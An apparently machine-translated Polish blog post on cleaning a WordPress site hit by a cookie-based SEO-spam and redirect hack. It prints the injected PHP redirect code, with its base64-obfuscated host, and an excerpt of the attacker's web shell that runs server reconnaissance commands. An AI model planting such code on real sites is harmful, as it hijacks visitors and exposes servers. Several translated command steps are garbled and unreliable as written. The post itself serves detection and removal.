W zeszłym miesiącu ciągle otrzymywałem ostrzeżenia wirus na blogu od niektórych gości. Początkowo zignorowałem ostrzeżenia, ponieważ miałem zainstalowany całkiem dobry program antywirusowy (Kaspersky AV 2009) i choć spędziłem dużo czasu na blogu, nigdy nie otrzymałem ostrzeżenia o wirusie (.. jakiś czas temu zauważyłem coś podejrzanego, co zniknęło przy pierwszym odświeżeniu. w końcu...).
Powoli, powoli zaczęły pojawiać się duże różnice ruch odwiedzających, po czym ostatnio ruch stale maleje i coraz więcej osób mi to mówi stealthsettings.com to jest Wirusat. Wczoraj otrzymałem od kogoś zrzut ekranu wykonany, gdy program antywirusowy zablokował jeden scenariusz z stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Przekonało mnie to na tyle, że zacząłem szukać tego we wszystkich źródłach. Pierwszy pomysł, który przyszedł mi do głowy, to to zrobić aktualizacja do najnowszej wersji WordPress (2.5.1), ale nie przed usunięciem wszystkich starych plików skryptów WordPress i wykonaniem kopia zapasowa bazy danych. Ta procedura nie dała żadnych rezultatów i prawdopodobnie zajęłoby mi dużo czasu, zanim dowiedziałbym się, gdzie jest błąd, gdyby mi nie powiedział Eugeniusz podczas dyskusji przy kawie, którą odkrył link w Google i byłoby miło to zobaczyć.
MyDigitalLife.info opublikował artykuł pod tytułem: „WordPress Hack: odzyskaj i napraw Google i wyszukiwarkę lub brak ruchu cookie przekierowanego do Your-Needs.info, AnyResults.Net, Golden-Info.net i innych nielegalnych stron”, i to jest koniec wątku, którego potrzebowałem.
Chodzi o wykorzystać przez WordPress w oparciu o pliki cookies, który moim zdaniem jest bardzo skomplikowany i wykonany zgodnie z książką. Wystarczająco mądry, żeby taki stworzyć Wstrzyknięcie SQL w bazie bloga, aby utworzyć niewidzialnego użytkownika do prostej rutynowej kontroli od Panel->Użytkownicy, aby sprawdzić „zapisywalne” katalogi i pliki na serwerze (które mają chmod 777), aby szukać i do wykonać pliki z uprawnieniami grupy lub nawet roota. Nie znam nazwy tego exploita i widzę, że napisano o nim niewiele artykułów, mimo że zainfekowanych blogów jest wiele, w tym z Rumunii. OK... Spróbuję wyjaśnić ogólnie na temat tego wirusa.
Co robi wirus?
Przede wszystkim wstawia w źródłach stron na blogach linki niewidoczne dla odwiedzających, ale widoczne i indeksowalne dla wyszukiwarek, zwłaszcza Google. W ten sposób przenieść Page Rank do witryn wskazanych przez atakującego. Po drugie, dodaje się jeszcze jeden kod przekierowania URL, dla gości, którzy pochodzą z Google, Live, Yahoo, ... lub z czytnika RSS i nie mają witryny w ciastko. I antywirus wykrywa to przekierowanie jako Trojan-Clicker.HTML.
Objawy:
Ogromny spadek ruchu odwiedzających, zwłaszcza na blogach, na których większość odwiedzających pochodzi z Google.
Zidentyfikować: (w tym miejscu problem staje się skomplikowany dla tych, którzy nie wiedzą zbyt wiele o phpmyadmin, php i Linuksie)
. OSTROŻNY!!! NAJPIERW ZRÓB KOPIĘ ZAPASOWĄ BAZY DANYCH!!!
1. Sprawdź źródła plików index.php, Header.php, stope.php, z tematu bloga i sprawdź, czy istnieje kod wykorzystujący szyfrowanie baza64 lub zawiera „if($ser=="1? && sizeof($_COOKIE)==0)” w postaci:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>...lub coś podobnego. Usuń ten kod!
Kliknij, wyobraź sobie…
Na powyższym zrzucie ekranu omyłkowo wybrałem „<?php get_header(); ?>Ten kod musi pozostać.
2. Użyj phpMyAdmin i przejdź do tabeli w bazie danych wp_użytkownicy, gdzie sprawdzasz, czy istnieje użytkownik bez nazwy, utworzony dnia 00:00:00 0000-00-00 (jest to możliwe w terenie login_użytkownika napisz „WordPress”. Zapisz identyfikator tego użytkownika (pole ID), a następnie go usuń.
Kliknij, wyobraź sobie…
*ten na zielonej linii, jego identyfikator należy usunąć i zachować. W jego przypadku senny, był ID=8 .
3. Podejdź do stołu wp_usermeta, gdzie trzeba usytuowany jesteś USUWAĆ linie związane z identyfikatorem (gdzie w polu identyfikator_użytkownika pojawi się wartość usuniętego identyfikatora).
4. W tabeli opcja_wp, wejdź aktywne_wtyczki i zobacz, która wtyczka jest podejrzanie aktywowana. Może używać zakończeń takich jak _old.giff, _old.pngg, _old.jpeg, _nowy.php.giffitp. kombinacje fałszywych rozszerzeń obrazów z _old i _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Usuń tę wtyczkę, a następnie przejdź do bloga –> Panel -> Wtyczki, gdzie dezaktywujesz i aktywujesz określoną wtyczkę.
Kliknij obraz, aby zobaczyć, jak zainfekowany plik wygląda w aktywnych_wtyczkach.
Podążaj ścieżką FTP lub SSH wskazaną w active_plugins i usuń plik z serwera.
5. Również w phpMyAdmin, w tabeli opcja_wp, znajdź i usuń linię zawierającą „rss_f541b3abd05e7962fcab37737f40fad8„i obróć”wewnętrzna_links_cache”.
W internal_links_cache linki spamowe pojawiające się na blogu i a Kod Google Adsense, hakera.
6. Zaleca się zmień hasło logowania się na blogu i tak dalej usuń wszystkich podejrzanych użytkowników. Zaktualizuj do najnowszej wersji WordPressa i ustaw blog tak, aby nie pozwalał już na rejestrację nowych użytkowników. Nie ma żadnej straty... nawet niezalogowany może komentować.
Powyżej starałem się wyjaśnić na ile, co w takiej sytuacji zrobić, aby oczyścić blog z tego wirusa. Problem jest znacznie poważniejszy, niż się wydaje i nie jest daleki od rozwiązania, ponieważ są one używane Słabości bezpieczeństwa serwera hostingowego, na którym znajduje się blog.
Jako pierwszy środek bezpieczeństwa, którzy mają dostęp Ssh, aby sprawdzić na serwerze, czy nadal istnieją pliki takie jak *_old* i *_new.* z końcówkami .gif, .jpeg, .pngg, .jpgg. Pliki te należy usunąć. Jeśli zmienimy nazwę pliku, np. top_right_old.giff W top_right_old.php, widzimy, że plik zawiera dokładnie kod exploita serwera.
Kilka przydatnych wskazówek dotyczących sprawdzania, czyszczenia i zabezpieczania serwera. (przez SSH)
1. płyta CD /tmp i sprawdź, czy są takie foldery tmpVFlma lub inne podobne kombinacje nazw i usuń je. Na zrzucie ekranu poniżej możesz zobaczyć dwa takie foldery dla mnie:
rm –rf numer folderu
2. Sprawdź i usuń (zmień chmod) jak najwięcej folderów z atrybutami chmod 777
znajdź wszystkie zapisywalne pliki w bieżącym katalogu: znajdować . -typ f -perm -2 -ls
znajdź wszystkie zapisywalne katalogi w bieżącym katalogu: znajdować . -typ d -perm -2 -ls
znajdź wszystkie zapisywalne katalogi i pliki w bieżącym katalogu: znajdować . -perm -2 –ls
3. Poszukaj podejrzanych plików na serwerze.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, OSTROŻNY!!! do plików, które ustawiają bit POŁUDNIE I Łyżwa. Pliki te są wykonywane z uprawnieniami użytkownika (grupy) lub roota, a nie użytkownika wykonującego plik. Pliki te mogą prowadzić do naruszenia uprawnień administratora, jeśli występują problemy z bezpieczeństwem. Jeśli nie używasz plików z bitami SUID i SGID, uruchom „zmień 0” na nich lub odinstaluj pakiet zawierający je.
Exploit zawiera gdzieś w źródle...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}...praktycznie w ten sposób znajduje naruszenia bezpieczeństwa. Otwórz porty, katalogi z możliwością zapisu i wykonywanie plików z uprawnieniami grupy/rootu.
Wrócę ze szczegółami...
Niektóre zainfekowane blogi: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... a listę można ciągnąć... dużo.
Możesz sprawdzić, czy blog jest zainfekowany, korzystając z wyszukiwarki Google. kopia & wklej:
strona:www.blegoo.com kup
Dobrej nocy i dobrej pracy ;) Myślę, że wkrótce Eugen przyjedzie z nowościami na prevezibil.imprevizibil.com.
brr :)
W: UWAGA! Zmiana motywu WordPress lub aktualizacja do wersji WordPress 2.5.1 NIE jest rozwiązaniem pozwalającym pozbyć się tego wirusa.
